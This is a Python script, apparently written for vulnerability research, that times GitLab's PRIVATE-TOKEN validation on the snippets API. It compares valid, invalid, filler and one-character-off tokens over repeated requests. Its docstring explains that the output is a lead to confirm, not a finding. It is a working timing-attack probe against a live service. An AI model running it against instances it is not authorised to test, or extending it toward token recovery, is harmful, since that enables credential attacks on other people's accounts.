GitLab — CWE-208 (Observable Timing Discrepancy): timing probe of PRIVATE-TOKEN validation on the `/api/v4/snippets` endpoint
import json
import os
import statistics
import time

import requests
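def _mask(token: str) -> str:
    """Return a display form of *token* that does not reveal the whole secret."""
    return f"{token[:4]}...{token[-4:] if len(token) > 8 else ''}"


def test_extended_vulnerabilities(
    *,
    base_url: str = "",
    token: str = "",
    samples: int = 20,
    timeout: float = 10.0,
) -> dict:
    """Probe the PRIVATE-TOKEN check for an observable timing difference (CWE-208).

    Issues the same GET against ``base_url`` with four tokens — the valid one, an
    obviously invalid one, a same-length filler, and the valid token with its last
    character changed — and records the round-trip time of every request.  Tokens
    are sent round-robin and the whole cycle is repeated ``samples`` times so that
    per-token min/median times can be compared; a single request per token (the
    original form of this script) is dominated by network jitter and cannot show a
    discrepancy either way.

    Keyword args:
        base_url: Endpoint to hit.  Defaults to ``$GITLAB_URL`` and then to
            ``https://gitlab.com/api/v4/snippets``.  The Host header is derived from
            this URL by ``requests``; it is no longer pinned to ``gitlab.com``, which
            silently broke the probe against any self-hosted instance.
        token: A valid personal access token.  Defaults to ``$GITLAB_TOKEN``.  The
            credential is deliberately not embedded in the source: this file is
            meant to be shared, and a token pasted here is a leaked token.
        samples: Number of requests per token (>= 1).
        timeout: Per-request timeout in seconds so a stalled server cannot hang
            the run.

    Returns:
        ``{label: [elapsed_seconds, ...]}`` for the four probe tokens, so a caller
        can run its own statistics on the raw samples.

    Raises:
        ValueError: if no token is available or ``samples`` < 1.
        requests.RequestException: on any transport failure (propagated as-is).

    Caveats for anyone reading the output: wall-clock round-trip time includes
    DNS/TCP/TLS setup on the first request, proxy and load-balancer hops, and any
    rate limiting the server applies after repeated 401s, all of which can dwarf a
    comparison-level difference.  Treat a result from this script as a lead to
    confirm with many more samples and a proper statistical test, not as a finding.
    """
    if not token:
        token = os.environ.get("GITLAB_TOKEN", "")
    if not token:
        raise ValueError("no token: pass token=... or set GITLAB_TOKEN")
    if samples < 1:
        raise ValueError("samples must be >= 1")
    if not base_url:
        base_url = os.environ.get("GITLAB_URL", "https://gitlab.com/api/v4/snippets")

    headers = {"Accept": "application/json"}

    # Change only the final character so the variant shares the longest possible
    # prefix with the real token — the case a byte-by-byte compare would leak.
    last = token[-1]
    one_char_off = token[:-1] + ("x" if last != "x" else "y")

    probes = [
        ("valid", token),
        ("invalid", "invalid_token_1"),
        ("filler", "a" * len(token)),
        ("one-char-off", one_char_off),
    ]
    timings = {label: [] for label, _ in probes}
    status = {}

    print("\n=== Test : Timing Attack Potential ===")

    # One session keeps the connection alive, so later samples do not each pay for
    # a fresh handshake; interleaving the tokens spreads slow drift across all four.
    session = requests.Session()
    for _ in range(samples):
        for label, probe_token in probes:
            probe_headers = dict(headers)
            probe_headers["PRIVATE-TOKEN"] = probe_token
            # perf_counter is monotonic and high resolution; time.time() can jump.
            started = time.perf_counter()
            response = session.get(base_url, headers=probe_headers, timeout=timeout)
            elapsed = time.perf_counter() - started
            timings[label].append(elapsed)
            status[label] = response.status_code

    for label, probe_token in probes:
        series = timings[label]
        print(f"\nToken [{label}]: {_mask(probe_token)}")
        print(f"Samples: {len(series)}")
        print(f"Min Response Time: {min(series):.6f}s")
        print(f"Median Response Time: {statistics.median(series):.6f}s")
        print(f"Status Code: {status[label]}")

    return timings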
if __name__ == "__main__":
    # Only run the network probe when executed directly, never on import.
    test_extended_vulnerabilities()